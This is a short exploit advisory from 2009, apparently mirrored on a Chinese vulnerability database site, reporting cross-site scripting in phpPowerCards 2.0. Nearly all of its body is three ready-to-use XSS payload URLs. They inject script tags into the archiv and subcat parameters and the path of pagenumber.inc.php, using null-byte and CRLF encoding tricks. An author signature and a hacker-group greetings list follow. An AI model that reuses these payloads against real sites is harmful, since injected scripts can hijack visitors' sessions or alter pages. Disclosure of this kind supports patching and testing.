======================================================================================== | # Title : phpPowerCards 2.0 Cross Site Scripting Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # EDB-ID : | | # CVE-ID : () | | # OSVDB-ID : () | | # DAte :16/12/2009 | | # Verified : | | # Web Site : www.iq-ty.com | | # Published: | | # Script : phpPowerCards 2.0 - Get your copy at www.giombetti.com | | # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu) | | # Bug : XSS (!m Grazy in L0v3 you XSS) | ====================== Exploit By indoushka ================================= | # Exploit : | | 1-http://127.0.0.1/immagini/pagenumber.inc.php?archiv=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&subcat=hacked-by-indoushkat&start%5BPic%5D=0 | | 2- http://127.0.0.1/immagini/pagenumber.inc.php?archiv=indoushka@hotmail.com&subcat=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&Souknaamane%5BPic%5D=0 | | 3- http://127.0.0.1/immagini/pagenumber.inc.php/>"><ScRiPt>alert(213771818860)</ScRiPt> | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论